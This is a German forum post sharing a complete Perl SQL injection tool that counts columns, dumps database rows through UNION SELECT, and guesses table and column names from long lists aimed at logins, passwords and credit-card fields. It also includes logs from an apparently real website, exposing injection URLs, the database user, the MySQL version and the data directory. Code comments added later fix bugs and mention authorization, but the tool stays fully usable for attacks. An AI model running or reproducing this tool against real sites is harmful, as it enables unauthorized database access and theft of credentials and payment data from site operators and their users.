Ich stelle euch hier ein schon etwas älteres Projekt von mir zur Verfügung. Da verschiedene SQL Injection Helper bei mir nicht besonders liefen, ganz abgesehen von Linux, habe ich mir selbst was dazu geschrieben.
Etwas besonderes ist es nicht, einfach nur hilfreich und nicht so abgefuckt wie schemafuzz :D
Die Funktionen sind in den Kommentaren im Quellcode beschrieben.
Bubi ist geschrieben in Perl
Zeilen gesamt: etwa 310
Auf Wunsch bastle ich noch Proxy- und Thread-Unterstützung ein ;)
Logfiles werden automatisch generiert und sollten alle wichtigen Informationen enthalten. Für Kritik und Codeverbesserungen bin ich offen :)
Intro
Logfile - Example:Zitat:
#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................. ...............
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# .................................................. .............
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sql.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# .................................................. .............
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
Script:Code:+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Columns:8
String: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8--+
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,j0k3
User: leeger_zuckerm@localhost
MySQL Version: 5.0.90-community
Directory: /var/lib/mysql/
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,UNHEX(HEX(CONCAT_WS(0x3a,99999,table_name,column_name,99999)))+from+information_schema.columns
Dumping Information:
[0] CHARACTER_SETS:CHARACTER_SET_NAME
[1] CHARACTER_SETS:DEFAULT_COLLATE_NAME
[2] CHARACTER_SETS:DESCRIPTION
[3] CHARACTER_SETS:MAXLEN
[4] COLLATIONS:COLLATION_NAME
[5] COLLATIONS:CHARACTER_SET_NAME
[6] COLLATIONS:ID
[7] COLLATIONS:IS_DEFAULT
[8] COLLATIONS:IS_COMPILED
[9] COLLATIONS:SORTLEN
[10] COLLATION_CHARACTER_SET_APPLICABILITY:COLLATION_NAME
[11] COLLATION_CHARACTER_SET_APPLICABILITY:CHARACTER_SET_NAME
[12] COLUMNS:TABLE_CATALOG
[13] COLUMNS:TABLE_SCHEMA
[14] COLUMNS:TABLE_NAME
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+and+1=0+union+select+1,2,3,4,5,6,7,j0k3
Scanning Tables:
+ information_schema.columns -> Scanning Columns:
- table_name
- column_name
Code:#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................................
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# ...............................................................
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sql.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# ...............................................................
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
use strict;
use warnings;
use LWP::UserAgent;
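# Banner.  Printed before any argument validation, so it also precedes the
# usage text.  NOTE(review): this tool fires live requests at whatever URL it
# is given; only point it at systems you are explicitly authorized to test.
print q
{
+-------------------------------------------------------------+
| SQL Injection Helper 1.0 |
| |
| + Column Counter |
| + SQL Data Grabber |
| + Name Information-Fuzzer |
| |
| < j0k3 > (C) by fred777 |
+-------------------------------------------------------------+
}; $|++;   # autoflush STDOUT so progress lines appear as they are produced

# Command line: mode switch, target URL and (for -c only) the "true word".
# Package globals on purpose - the mode subs below read them directly.
our ($op,$url,$true) = @ARGV;
# Log file (appended to, in the current directory) and the LIMIT row count
# used by the -d dumper.
our ($file,$lim) = ('log.txt',1000);
our $ua = LWP::UserAgent->new();
# Without a timeout a single stalled connection can hang the fuzzer (several
# thousand requests) for LWP's 180 s default each.
$ua->timeout(30);
my $head =
"+-------------------------------------------------------------+\n".
"| j0k3 SQL Injection Helper - Logfile |\n".
"+-------------------------------------------------------------+\n";
# Validation must tolerate missing arguments: with no arguments at all $op
# and $url are undef and a bare pattern match only emits "uninitialized
# value" warnings before usage() gets a chance to run.
usage() unless defined $op  && $op  =~ m{^(?:-d|-c|-f)$}i;
# https is accepted as well; LWP handles it when LWP::Protocol::https is
# installed and otherwise answers with a synthetic error response that the
# mode subs report.
usage() unless defined $url && $url =~ m{^https?://}i;
writing($head);
# The switch check above is case-insensitive but the dispatch was not, so
# "-C" passed validation and then silently did nothing.  Normalise once.
my $mode = lc $op;
order()   if $mode eq '-c';
selects() if $mode eq '-d';
fuzz()    if $mode eq '-f';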
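# -c: count the columns of the injectable SELECT.  Issues "ORDER BY n" for
# n = 1, 2, ... and stops at the first n whose page no longer contains the
# caller's true-word; the column count is n-1.  Prints and logs the count
# plus a ready-made "AND 1=0 UNION SELECT 1,2,...,n" string.
sub order {
    error() if(!$true);
    # Hard upper bound.  If the true-word is something that appears on every
    # page (site name, footer text) the ORDER BY probe never fails and the
    # original loop ran forever.
    my $max  = 256;
    my $cols = 0;
    while ($cols < $max) {
        my $resp = $ua->get("$url+ORDER+BY+".($cols+1)."--+");
        # get() never returns undef, so the original "or die" could not fire:
        # transport failures come back as a synthetic response carrying this
        # header.  Stop rather than report "0 columns" for an unreachable host.
        die "\n".$resp->status_line."\n"
            if ($resp->header('Client-Warning') || '') eq 'Internal response';
        # \Q...\E: the true-word is a literal, not a pattern.  Unquoted, a "."
        # or "+" in it would silently change what is matched.
        last unless $resp->content =~ m:\Q$true\E:i;
        $cols++;
    }
    warn "\nStopped at $max columns; true-word '$true' probably matches every page.\n"
        if $cols >= $max;
    warn "\nTrue-word '$true' never matched; check the URL and <true-word>.\n"
        if $cols == 0;
    my $str = "$url+AND+1=0+UNION+SELECT+1";
    $str .= ",$_" for (2..$cols);
    printf("\nColumns: %d\nString: %s\n",$cols,"$str--+");
    writing("\nColumns:".$cols."\nString: $str--+\n\n");
}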
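# -d: two modes, selected by the shape of $url.
#   * URL contains the j0k3 marker and no FROM clause: the marker is replaced
#     by user()/version()/@@datadir and the three values are reported.
#   * URL contains "j0k3(col1,col2,...)+from+table": the marker is replaced by
#     a CONCAT_WS of those columns and rows are dumped one LIMIT offset at a
#     time until the marker disappears or the page shows an error.
# Every probe value is wrapped in 99999:...:99999 so it can be located in the
# response regardless of the surrounding HTML.
sub selects {
    # "from" is tested case-insensitively on both branches.  The original
    # tested it case-sensitively here and case-insensitively below, so a URL
    # written with "FROM" fell into the wrong branch.
    if($url =~ m:j0k3: && $url !~ m:from:i) {
        my $inf = 'UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@@datadir,99999)))';
        my $st = replace($url,'j0k3',$inf);
        my $resp = $ua->get("$st--+");
        # get() never returns undef; transport failures come back as a
        # synthetic response carrying this header.
        die "\n".$resp->status_line."\n"
            if ($resp->header('Client-Warning') || '') eq 'Internal response';
        # Guard the captures: on a non-matching page the original printed
        # whatever (stale or undef) $1..$3 happened to hold.
        if($resp->content =~ m![9]{5}:(.+):(.+):(.+):[9]{5}!i) {
            my $t = "\nUrl: $url\n\nUser: $1\nMySQL Version: $2\nDirectory: $3\n\n";
            print $t; writing($t);
        }
        else {
            my $t = "\nUrl: $url\n\nNo 99999:...:99999 marker in the response; the injection point or the column position of j0k3 is probably wrong.\n\n";
            print $t; writing($t);
        }
    }
    elsif($url =~ m:from:i) {
        # The column list inside j0k3(...) is user supplied and ends up in the
        # regex used by replace(), so it has to be quoted literally: an
        # unquoted "(" or "+" would otherwise change the pattern or make it
        # fail to match, leaving the URL unmodified.
        error() unless $url =~ m:j0k3\((.+)\):i;
        my $cols = $1;
        my $str = "UNHEX(HEX(CONCAT_WS(0x3a,99999,$cols,99999)))";
        my $st = replace($url,quotemeta("j0k3($cols)"),$str);
        print "\nDumping Information:\n\n"; writing("\nUrl: $st\n\nDumping Information:\n\n");
        my $c = 0;
        while (1) {
            my $resp = $ua->get("$st+LIMIT+$c,$lim--+");
            die "\n".$resp->status_line."\n"
                if ($resp->header('Client-Warning') || '') eq 'Internal response';
            my $body = $resp->content;
            # Print the row only when the marker is actually present; the
            # original printed "[n] " with a stale $1 otherwise.  The greedy
            # (.*) is kept from the original: it spans to the last marker on
            # the same line, which is fine when the page reflects one row.
            if($body =~ m![9]{5}:(.*):[9]{5}!) {
                print "[$c] $1\n"; writing("[$c] $1\n");
            }
            $c++;
            # Stop at the first empty/missing row or when the page reports an
            # error (any occurrence of "error" in the page, as in the original).
            last unless $body =~ m![9]{5}:(.+):[9]{5}! && $body !~ m:error:i;
        }
    }
    else {
        error();
    }
}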
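# -f: guess table and column names.  For every candidate table the j0k3
# marker is replaced by 99999 and "FROM <table>" is appended; if the marker
# shows up in the page (and the page does not contain "error") the table is
# assumed to exist and every candidate column is probed the same way with
# CONCAT(99999,0x3a,<column>) LIMIT 0,1.  Results are printed and logged.
# The detection is purely heuristic: a page that contains the word "error"
# anywhere (e.g. in a script) hides every hit.
sub fuzz {
    # Candidate table names (see the "darkc0de" credit in the header).
    my @tables =(
    'user','admin','users','admins','account','accounts','adm','admin_login',
    'member','memberlist','members','login_admin','login_admins','login_user',
    'login_users','logins','logon','logs','admin_user','admin_userinfo','administer',
    'administrable','administrate','administration','administrator','administrators',
    'adminrights','adminuser','login','mambo_session','mambo_users','manage','Logins',
    'manager','mb_users','mybb_users','e107.e107_user','e107_user','Admins','Login',
    'phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users',
    'tbladmins','sort','_wfspro_admin','4images_users','a_admin','art','article_admin',
    'articles','artikel','aut','author','autore','backend','backend_users','backenduser',
    'chat_config','chat_messages','chat_users','client','clients','clubconfig',
    'company','config','contact','contacts','content', 'control','cpg_config',
    'cpg132_users','customer','customers','customers_basket','dbadmins','dealer',
    'dealers','diary','download','forum.ibf_members','fusion_user_groups',
    'fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings',
    'ibf_members','ibf_members_converge','ibf_sessions','icq','images','index',
    'info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users',
    'jos_comprofiler_members','jos_contact_details','jos_joomblog_users',
    'jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici',
    'kpro_adminlogs','kpro_user','links','lost_pass','lost_passwords','movie','movies',
    'lostpass','lostpasswords','m_admin','main','minibbtable_users','mitglieder',
    'mysql','mysql.user','name','names','news','news_lostpass','newsletter',
    'nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users',
    'obb_profiles','order','orders','parol','partner','partners','passes','password',
    'passwords','perdorues','perdoruesit','phorum_session','phorum_user',
    'phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user',
    'punbb_users','pwd','pwds','reg_user','reg_users','registered','reguser','regusers',
    'session','sessions','settings','shop.cards','shop.orders','site_login',
    'site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members',
    'SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser',
    'sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member',
    'tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user',
    'tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test',
    'usebb_members','user_admin','user_info','user_list','user_login','user_logins',
    'user_names','usercontrol','userinfo','userlist','userlogins','username','usernames',
    'userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members',
    'webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin',
    'xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ActiveDataFeed',
    'Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1',
    'DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties',
    'Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre',
    'JamPass','MyTicketek','MyTicketekArchive','News','Promotion','Region',
    'SearchOptions','Series','Sheldonshows','StateList','States','SubCategory',
    'Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent',
    'sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows',
    'Ticket System Acc Numbers','TimeDiff','Titles','Total Members','UserPreferences',
    'uvw_Category','uvw_Preferences','Venue','venues','VenuesNew','stone list',
    'tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor',
    'tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory',
    'tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList',
    'viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info',
    'CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name',
    'jos_user','table_user','email','mail','bulletin','cc_info','login_name',
    'admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin',
    );
    # Candidate column names.  Kept verbatim; 'cvvnumber]' looks like a stray
    # bracket in the original list ('cvvnumber' is already present above it).
    my @columns = (
    'user','name','username','password','passwd','pass','benutzername','passwort',
    'cc_number','id','email','pwd','user_name','customers_email_address',
    'customers_password','user_password','user_pass','admin_user','admin_password',
    'admin_pass','usern','user_n','username1','password1','email1','id1',
    'users','login','logins','login_user','login_admin','login_username','user_username',
    'user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid',
    'admin_userid','adminusername','admin_username','adminname','admin_name',
    'usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid',
    'userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user',
    'wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria',
    'kodi','emer','ime','korisnik','korisnici','user1','administrator','text',
    'administrator_name','mem_login','login_password','login_pass','login_passwd',
    'login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w',
    'user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin',
    'user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password',
    'memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass',
    'mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username',
    'my_name','my_password','my_email','cvvnumber','about','access','accnt',
    'accnts','account','accounts','admin','adminemail','adminlogin','adminmail',
    'admins','aid','aim','auth','authenticate','authentication','blog','cc_expires',
    'cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername',
    'conf','config','contact','converge_pass_hash','converge_pass_salt','crack',
    'customer','customers','cvvnumber]','data','db_database_name','db_hostname',
    'db_password','db_username','download','e-mail','emailaddress','full','gid',
    'group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group',
    'id_member','images','index','ip_address','last_ip','last_login','lastname',
    'log','login_name','login_pw','loginkey','loginout','logo','md5hash','member',
    'member_id','member_login_key','member_name','memberid','membername','members',
    'new','news','nick','number','nummer','pass_hash','passwordsalt','passwort',
    'personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer',
    'secretquestion','serial','session_member_id','session_member_login_key','sesskey',
    'setting','sid','spacer','status','store','store1','store2','store3','store4',
    'table_prefix','temp_pass','temp_password','temppass','temppasword','text','un',
    'user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword',
    'user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm',
    'userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name',
    'xar_pass');
    print "\nUrl: $url\n"; writing("\nUrl: $url\n");
    print "\nScanning Tables:\n"; writing("\nScanning Tables:\n");
    # The table probe depends only on $url, not on the table, so build it
    # once instead of once per candidate (the original rebuilt it every loop).
    my $probe = replace($url,'j0k3',9x5);
    foreach my $tab (@tables) {
        my $resp = $ua->get("$probe+FROM+$tab--+");
        # get() never returns undef; a transport failure is a synthetic
        # response with this header.  Abort instead of silently scanning an
        # unreachable host through the whole list.
        die "\n".$resp->status_line."\n"
            if ($resp->header('Client-Warning') || '') eq 'Internal response';
        my $body = $resp->content;
        # "[^,]99999": presumably excludes the marker as it is reflected in the
        # echoed query string (",99999") so only a marker rendered by the
        # SELECT counts.  Kept as in the original.
        next unless $body =~ m:[^,][9]{5}: && $body !~ m:error:i;
        print "+ $tab -> Scanning Columns:\n";
        writing("+ $tab -> Scanning Columns:\n");
        foreach my $col (@columns) {
            my $cre   = replace($url,'j0k3',"CONCAT(99999,0x3a,$col)");
            my $cresp = $ua->get("$cre+FROM+$tab+LIMIT+0,1--+");
            die "\n".$cresp->status_line."\n"
                if ($cresp->header('Client-Warning') || '') eq 'Internal response';
            my $cbody = $cresp->content;
            # "[^(]99999": same idea, skipping the reflected "CONCAT(99999".
            if($cbody =~ m:[^(][9]{5}: && $cbody !~ m:error:i) {
                print "- $col\n"; writing("- $col\n");
            }
        }
    }
}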
# Return a copy of $subject with the FIRST match of $pattern substituted by
# $with.  $pattern is used as a regular expression (callers pass escaped
# parentheses for the j0k3(...) form), $with is inserted literally; the
# caller's string is not modified.
sub replace {
    my ($subject, $pattern, $with) = @_;
    my $copy = $subject;
    $copy =~ s/$pattern/$with/;
    return $copy;
}
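# Append $text to the log file named by the global $file.  The file is
# reopened on every call so a crash mid-run still leaves everything written
# so far on disk.  NOTE(review): the log holds target URLs and whatever the
# target returned (DB user, version, dumped rows) and is created with the
# process's default umask in the current directory - treat it as sensitive.
sub writing {
    my $text = shift;
    # Three-argument open with a lexical handle: the bareword two-argument
    # form interprets mode characters found in the file name.
    open my $fh, '>>', $file or die "\n$file: $!\n";
    print {$fh} $text;
    # Buffered write errors only surface at close.
    close $fh or die "\n$file: $!\n";
}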
# Print the short "read the usage" box and terminate the program.  Called by
# the mode subs when the URL does not have the shape they need.
sub error {
    my $border = "+-------------------------------------------------------------+\n";
    print $border,
          "| Error: Read Usage! - \$ perl sql.pl |\n",
          $border;
    exit;
}
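# Print the full usage text and terminate.  Called when the mode switch or the
# URL fails validation.  The examples must agree with what selects() actually
# parses: the marker is "j0k3(...)", and the original text said "j0ke(...)",
# which no URL built from it would ever match.
sub usage {
    print q {
+-------------------------------------------------------------+
| INFORMATION |
+-------------------------------------------------------------+
| |
| Column Counter: |
| $ perl sql.pl -c <url> <true-word> |
| $ perl sql.pl -c http://seite.de/?id=7 j0k3 |
| |
| SQL Data Grabber: |
| $ perl sql.pl -d <url> |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select+1, |
| j0k3(column1,column2)+from+table |
| |
| Name Information Fuzzer: |
| $ perl sql.pl -f <url> |
| $ perl sql.pl -f http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| |
| < j0k3 > |
+-------------------------------------------------------------+
}; exit;
}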
# EOF - < j0k3 > - > 06.2010 - version 1.0